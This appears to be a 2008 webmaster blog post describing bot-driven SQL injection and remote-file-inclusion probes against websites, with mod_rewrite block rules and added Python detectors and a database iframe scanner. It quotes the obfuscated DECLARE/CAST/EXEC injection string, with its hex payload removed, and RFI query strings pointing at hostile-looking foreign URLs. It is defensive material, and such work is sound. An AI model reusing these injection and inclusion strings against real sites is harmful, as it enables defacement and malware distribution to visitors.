Aug 22, 2008

DECLARE%20@S%20CHAR(4000);SET%20@S=CAST

The latest hack running right now is an injection attempt using a string like this:

DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C----removed----%20AS%20CHAR(4000));EXEC(@S);

This is a bot attack and is coming from everywhere.
They come in 2 at a time from the same IP.

They are trying to inject code into your site that displays an iframe, which takes visitors to another site. It doesn't look like they are attacking PHP; they are attacking ASP, Cold Fusion and Perl. See more here: isc.sans.org
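To show what the string above is made of, here is an added Python example (not code from the original post) that percent-decodes request lines, matches the DECLARE/CAST/EXEC shape, and turns the hex literal back into the SQL it hides. The sample requests are constructed, and the hex in them encodes a harmless placeholder statement rather than anything the bots carried; the only real fragment used is the 0x4445434C visible in the post, which decodes to "DECL".

```python
"""Detect the DECLARE @S ... CAST(0x... AS CHAR) ... EXEC(@S) injection shape in
URL-encoded request lines and recover the statement hidden in the hex literal.

Added example, not code from the original post. SAMPLE_REQUESTS are
constructed; the hex literal in them encodes a harmless placeholder
statement, not the payload the bots carried.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Shape of the injected string after percent-decoding:
#   DECLARE @S CHAR(4000);SET @S=CAST(0x<hex> AS CHAR(4000));EXEC(@S)
INJECTION_RE = re.compile(
    r"DECLARE\s+@(?P<var>\w+)\s+N?CHAR\(\d+\)\s*;"
    r"\s*SET\s+@(?P=var)\s*=\s*CAST\(\s*0x(?P<hex>[0-9A-Fa-f]+)\s+AS\s+(?P<wide>N?)CHAR\(\d+\)\s*\)\s*;"
    r"\s*EXEC\s*\(\s*@(?P=var)\s*\)",
    re.IGNORECASE,
)


def decode_hex_literal(hexdigits: str, wide: bool = False) -> str:
    """Turn a T-SQL 0x... literal back into text.

    A CHAR cast holds single-byte characters; an NCHAR cast holds UTF-16LE.
    The fragment visible in the post, 0x4445434C, decodes to "DECL".
    """
    raw = bytes.fromhex(hexdigits)
    return raw.decode("utf-16-le" if wide else "latin-1", errors="replace")


def inspect_request(line: str) -> Optional[dict]:
    """Return the variable name and hidden SQL if `line` carries the
    injection, else None. Decoding first defeats the %20 / %3B obfuscation."""
    m = INJECTION_RE.search(unquote(line))
    if not m:
        return None
    return {
        "variable": "@" + m.group("var"),
        "hidden_sql": decode_hex_literal(m.group("hex"), wide=m.group("wide").upper() == "N"),
    }


def scan(lines: List[str]) -> List[Tuple[int, dict]]:
    """Index and details of every line that matches."""
    hits = []
    for i, line in enumerate(lines):
        found = inspect_request(line)
        if found:
            hits.append((i, found))
    return hits


# Constructed sample traffic. The hex encodes PLACEHOLDER_SQL, which is inert.
PLACEHOLDER_SQL = "SELECT 'placeholder statement'"
SAMPLE_HEX = PLACEHOLDER_SQL.encode("latin-1").hex().upper()
SAMPLE_REQUESTS = [
    "GET /products.asp?id=42 HTTP/1.1",
    "GET /products.asp?id=42;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
    + SAMPLE_HEX + "%20AS%20CHAR(4000));EXEC(@S);-- HTTP/1.1",
    "GET /search.asp?q=declare%20the%20cast HTTP/1.1",   # the words without the structure
]

if __name__ == "__main__":
    for i, hit in scan(SAMPLE_REQUESTS):
        print(f"line {i}: injection through {hit['variable']} -> {hit['hidden_sql']!r}")
```

Matching the whole DECLARE/SET/CAST/EXEC structure rather than the bare keywords keeps ordinary search terms containing "declare" or "cast" from tripping the check, and decoding the literal gives you the statement to log rather than an opaque hex blob.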

Also see this post, which recommends these mod_rewrite rules:


# The payload arrives in the query string; %{REQUEST_URI} does not include it
RewriteCond %{QUERY_STRING} CAST\( [NC,OR]
RewriteCond %{QUERY_STRING} DECLARE [NC]
RewriteRule .* - [F]

But a better page on how to block this with .htaccess is located here.


They are also scanning for a delay in page return, so any script that sleeps when it detects a hack must have the sleep removed, or they will come back and hit you harder.


Just the hits will bring your server down if you try to ban all the IPs being used, so I have modified the hacker modules.

Update hacker modules Here.




You will also want to download your databases and scan them for iframes and JavaScript.
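A scan of the kind that sentence calls for, as an added Python example (not the post's own tool): it walks every text-typed column of every table and reports the rows containing an iframe or script tag. It runs against an in-memory SQLite database seeded with constructed rows; on a real server you would point the same scan at the exported tables, and example.invalid is a placeholder host.

```python
"""Scan every text column of every table for injected iframe and script tags.

Added example, not the post's own tool. It runs on an in-memory SQLite
database seeded with constructed rows; "example.invalid" is a placeholder host.
"""
import re
import sqlite3
from typing import List, Tuple

# <iframe ...> or <script ...>, any case, tolerating whitespace after '<' and attributes
SUSPECT_TAG_RE = re.compile(r"<\s*(iframe|script)\b[^>]*>", re.IGNORECASE | re.DOTALL)


def text_columns(conn: sqlite3.Connection, table: str) -> List[str]:
    """Names of columns whose declared type is textual (CHAR/TEXT/CLOB families)."""
    cols = []
    for _cid, name, ctype, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
        t = (ctype or "").upper()
        if any(k in t for k in ("CHAR", "TEXT", "CLOB")):
            cols.append(name)
    return cols


def scan_database(conn: sqlite3.Connection) -> List[Tuple[str, str, int, str]]:
    """Return (table, column, rowid, matched tag) for every suspicious value."""
    findings = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for col in text_columns(conn, table):
            rows = conn.execute(f'SELECT rowid, "{col}" FROM "{table}" WHERE "{col}" IS NOT NULL')
            for rowid, value in rows:
                m = SUSPECT_TAG_RE.search(str(value))
                if m:
                    findings.append((table, col, rowid, m.group(0)))
    return findings


def build_sample_db() -> sqlite3.Connection:
    """Constructed data: two clean rows and two rows carrying injected tags."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name VARCHAR(100), descr TEXT, price REAL);
        CREATE TABLE news (id INTEGER PRIMARY KEY, title NVARCHAR(200), body NTEXT);
        INSERT INTO products (name, descr, price) VALUES
          ('Widget', 'A plain widget.', 9.99),
          ('Gadget', 'A gadget.<iframe src="http://example.invalid/x" width=0 height=0></iframe>', 19.99);
        INSERT INTO news (title, body) VALUES
          ('Hello', '<p>Welcome</p>'),
          ('Update<SCRIPT src="http://example.invalid/s.js"></SCRIPT>', 'text');
    """)
    return conn


if __name__ == "__main__":
    for table, col, rowid, tag in scan_database(build_sample_db()):
        print(f"{table}.{col} rowid={rowid}: {tag}")
```

Reporting the table, column and rowid rather than just a count is what makes cleanup possible: the injected iframe was appended to existing field contents, so each hit has to be edited back rather than deleted.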

Aug 6, 2008

magnum.liquidweb.com hacker

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322)
64.91.248.2 magnum.liquidweb.com
string=[ feed=http%3A%2F%2Fchyngachanga.ru%2Fcontent%2Fwuge%2Fowofi%2F ]
The hacker hits with this string, trying to get my server to run his scripts.

Then, after getting banned, he keeps trying with this set of scripts.

?feed=http%3A%2F%2Fwww.qubestunes.com%2Ftreytest%2F1%2Fadoyuru%2Fzagu%2F
p=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fomoj%2Femuqir%2F

They are all scripts used by hackers to display a test message on your server:
http://chyngachanga.ru/content/wuge/owofi/
http://www.qubestunes.com/treytest/1/adoyuru/zagu/
http://www.heaven-house.kz/templates_c/omoj/emuqir/
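The feed= and p= probes above all carry a full URL in a parameter value, which is what a remote-file-inclusion scanner sends. As an added Python example (not the post's own hacker module), the following flags every parameter whose decoded value is an absolute URL to a host that is not your own, and groups the foreign hosts by source IP. The sample query strings, IPs and hostnames are constructed placeholders, and LOCAL_HOSTS is an assumed list you would replace with your site's names.

```python
"""Flag request parameters whose value is an absolute URL to a foreign host,
the remote-file-inclusion probe pattern (feed=http://..., p=http://...).

Added example, not the post's own hacker module. LOCAL_HOSTS and the hosts in
SAMPLE_QUERIES are constructed placeholders.
"""
from collections import defaultdict
from typing import Dict, List, Set, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: the hostnames this site legitimately serves; URLs pointing here are not foreign.
LOCAL_HOSTS = {"www.example.invalid", "example.invalid"}
REMOTE_SCHEMES = {"http", "https", "ftp"}


def remote_include_params(query: str, local_hosts: Set[str] = LOCAL_HOSTS) -> List[Tuple[str, str, str]]:
    """Return (parameter, host, url) for each parameter carrying a URL to a foreign host."""
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decoded once; decode again so a double-encoded probe (%253A) is not missed
        candidate = unquote(value)
        parts = urlsplit(candidate)
        host = parts.hostname
        if parts.scheme.lower() in REMOTE_SCHEMES and host and host not in local_hosts:
            hits.append((name, host, candidate))
    return hits


def hosts_by_source(entries: List[Tuple[str, str]]) -> Dict[str, Set[str]]:
    """Group the foreign hosts each client IP tried to pull in, which is the
    view you need before deciding whether a source is worth blocking."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for ip, query in entries:
        for _, host, _ in remote_include_params(query):
            seen[ip].add(host)
    return dict(seen)


# Constructed sample traffic in the shape the post shows (parameter=percent-encoded URL).
SAMPLE_QUERIES = [
    "feed=http%3A%2F%2Fscripts.example.invalid%2Fcontent%2Fwuge%2Fowofi%2F",
    "p=http%3A%2F%2Fother.example.invalid%2Ftemplates_c%2Fomoj%2Femuqir%2F&page=2",
    "page=2&ref=http%3A%2F%2Fwww.example.invalid%2Findex.asp",   # our own host, not a probe
    "q=http+headers+tutorial",                                     # plain text, no scheme
]
SAMPLE_LOG = [("192.0.2.10", SAMPLE_QUERIES[0]), ("192.0.2.10", SAMPLE_QUERIES[1]),
              ("192.0.2.77", SAMPLE_QUERIES[2])]

if __name__ == "__main__":
    for ip, hosts in hosts_by_source(SAMPLE_LOG).items():
        print(ip, "tried to include from", sorted(hosts))
```

Checking the parsed scheme and host, rather than grepping for "http", avoids flagging ordinary search terms or links back to your own site, and the per-IP grouping shows when one source is cycling through several hosting locations as the post describes.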